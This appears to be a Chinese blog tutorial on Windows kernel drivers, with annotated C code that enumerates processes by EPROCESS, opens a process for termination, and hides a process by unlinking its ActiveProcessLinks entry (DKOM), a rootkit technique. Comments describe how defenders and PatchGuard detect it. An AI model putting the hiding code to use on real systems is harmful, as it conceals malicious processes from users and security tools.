用到的结构体

http://www.irohane.top/index.php/archives/613/

用到的函数

http://www.irohane.top/index.php/archives/527/

http://www.irohane.top/index.php/archives/636/



  1. 使用 PsLookupProcessByProcessId 函数获取 EPROCESS 来判断进程是否有效，成功时返回值为 0
  2. EPROCESS 偏移 0xb4 为进程 ID（UniqueProcessId），PsGetProcessImageFileName 获取进程名
  3. EPROCESS 偏移 0xb8 为活动进程双向链表，可以通过摘链来达到进程隐藏
PEPROCESS D_LookupProcess(HANDLE hPid)    // Resolve a PID to its EPROCESS; NULL when no such process exists
{
    /*
     * Thin wrapper around PsLookupProcessByProcessId so callers can test
     * for process existence with a single NULL check.
     *
     * Ownership: on success the returned EPROCESS carries the object
     * reference taken by PsLookupProcessByProcessId. The caller owns that
     * reference and must release it with ObDereferenceObject.
     */
    PEPROCESS process = NULL;
    NTSTATUS status = PsLookupProcessByProcessId(hPid, &process);

    return NT_SUCCESS(status) ? process : NULL;
}

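VOID EnumProcess()    // Enumerate live processes by probing candidate PIDs
{
    /*
     * Walks candidate PIDs (multiples of 4, the granularity the kernel
     * hands them out in) up to 0x25600 and logs the EPROCESS address,
     * PID and image name of every one that exists.
     *
     * Fixes relative to the original:
     *  - Each PID was looked up twice (D_LookupProcess, then
     *    PsLookupProcessByProcessId again) but dereferenced only once,
     *    leaking one object reference per live process. One lookup is
     *    now paired with exactly one ObDereferenceObject.
     *  - The PID was read from the hard-coded EPROCESS offset 0xb4, which
     *    is only valid for one specific 32-bit build. The documented
     *    accessor PsGetProcessId is used instead, so the code does not
     *    depend on the EPROCESS layout.
     *  - Unused local pthread removed.
     */
    PEPROCESS pEProc = NULL;
    ULONG id = 0;

    for (id = 4; id < 0x25600; id = id + 4)
    {
        pEProc = D_LookupProcess(ULongToHandle(id));
        if (!pEProc)
        {
            // No process with this id: nothing to release, try the next one.
            continue;
        }

        KdPrint(("EPROCESS = [%p] - PID = [%d] - Name =[%s]\n", pEProc, HandleToULong(PsGetProcessId(pEProc)), PsGetProcessImageFileName(pEProc)));

        // Release the reference taken by the lookup inside D_LookupProcess.
        ObDereferenceObject(pEProc);
    }
}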



//结束进程

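VOID KillProcess(UINT32 PID)
{
    /*
     * Opens the process identified by PID with PROCESS_TERMINATE access.
     * As on the original page, no termination call is made: the function
     * only checks that the process can be opened for that access and
     * then releases the handle.
     *
     * Fixes relative to the original:
     *  - The handle returned by ZwOpenProcess was never closed, leaking
     *    one kernel handle per call. It is now closed on the success path.
     *  - The NTSTATUS was ignored; failures are now logged and the
     *    function returns without touching the (unset) handle.
     *  - The access mask was the magic number 1; PROCESS_TERMINATE is the
     *    named constant with that value.
     *  - OBJECT_ATTRIBUTES is initialised with InitializeObjectAttributes
     *    and OBJ_KERNEL_HANDLE, so the handle lives in the kernel handle
     *    table and is not reachable from the current user-mode process.
     */
    HANDLE hProcess = NULL;
    CLIENT_ID clientId = { 0 };
    OBJECT_ATTRIBUTES objAttr;
    NTSTATUS status;

    clientId.UniqueProcess = ULongToHandle(PID);
    clientId.UniqueThread = NULL;          // open the process, not a specific thread
    InitializeObjectAttributes(&objAttr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);

    status = ZwOpenProcess(
        &hProcess,          // receives the opened handle
        PROCESS_TERMINATE,  // requested access (== 1, as in the original)
        &objAttr,           // object attributes
        &clientId           // process identity
    );
    if (!NT_SUCCESS(status))
    {
        KdPrint(("ZwOpenProcess(PID = %u) failed: 0x%08X\n", PID, status));
        return;
    }

    ZwClose(hProcess);   // release the kernel handle; the original leaked it
}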

//隐藏进程 简单的 摘链

VOID RemoveListEntry(PLIST_ENTRY ListEntry)
{
    /*
     * Unlinks ListEntry from its doubly-linked list in place (DKOM).
     * HideProcess calls this on EPROCESS.ActiveProcessLinks, i.e. the
     * process list reachable from PsActiveProcessHead that list-based
     * enumerators walk.
     *
     * Synchronization caveat: raising to DISPATCH_LEVEL only stops
     * preemption on the current CPU. It does not acquire the lock the
     * kernel uses to guard this list, so an insert or remove running
     * concurrently on another CPU is unsynchronized with this write.
     *
     * Defender view: the list is modified but the process keeps its
     * entry in the kernel's PID handle table and remains schedulable;
     * cross-view comparison (PID table vs. linked list) exposes the
     * inconsistency, and on x64 PatchGuard treats this kind of kernel
     * structure modification as corruption.
     */
    KIRQL OldIrql;
    // Raise to DISPATCH_LEVEL for the duration of the two pointer writes.
    OldIrql = KeRaiseIrqlToDpcLevel();
    // Make the neighbours point past this entry.
    ListEntry->Flink->Blink = ListEntry->Blink;
    ListEntry->Blink->Flink = ListEntry->Flink;
    KeLowerIrql(OldIrql);
}

//隐藏进程仅限于任务栏
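VOID HideProcess(int PID)
{
    /*
     * Looks up the EPROCESS for PID and unlinks its ActiveProcessLinks
     * entry via RemoveListEntry (DKOM).
     *
     * PROCESS_ACTIVE_PROCESS_LINKS_OFFSET is not defined on this page
     * (project-defined); the text above gives 0xb8 for this build. The
     * offset is build- and architecture-specific.
     *
     * Fixes relative to the original:
     *  - The offset was added to (ULONG32)pEProc, which truncates the
     *    pointer to 32 bits on a 64-bit build and is undefined behaviour.
     *    Byte arithmetic on a PUCHAR is used instead.
     *  - The log line printed PsGetProcessInheritedFromUniqueProcessId
     *    (the parent PID) under the label "PID". It now prints the
     *    process's own id from PsGetProcessId and the parent separately.
     *  - Failure of the lookup is handled with an early return.
     *
     * Defender note: after unlinking, the process is still present in the
     * kernel's PID handle table and still runs; cross-view detection and
     * PatchGuard (x64) flag this inconsistency.
     */
    PEPROCESS pEProc = NULL;

    if (!NT_SUCCESS(PsLookupProcessByProcessId(ULongToHandle((ULONG)PID), &pEProc)))
    {
        return;   // no such process: nothing to unlink, nothing to release
    }

    KdPrint(("EPROCESS = [%p] - PID = [%d] - Parent = [%d] - Name =[%s]\n",
             pEProc,
             HandleToULong(PsGetProcessId(pEProc)),
             HandleToULong(PsGetProcessInheritedFromUniqueProcessId(pEProc)),
             PsGetProcessImageFileName(pEProc)));

    // Byte-offset arithmetic on PUCHAR keeps the full pointer width.
    RemoveListEntry((PLIST_ENTRY)((PUCHAR)pEProc + PROCESS_ACTIVE_PROCESS_LINKS_OFFSET));

    // Release the reference taken by PsLookupProcessByProcessId.
    ObDereferenceObject(pEProc);
}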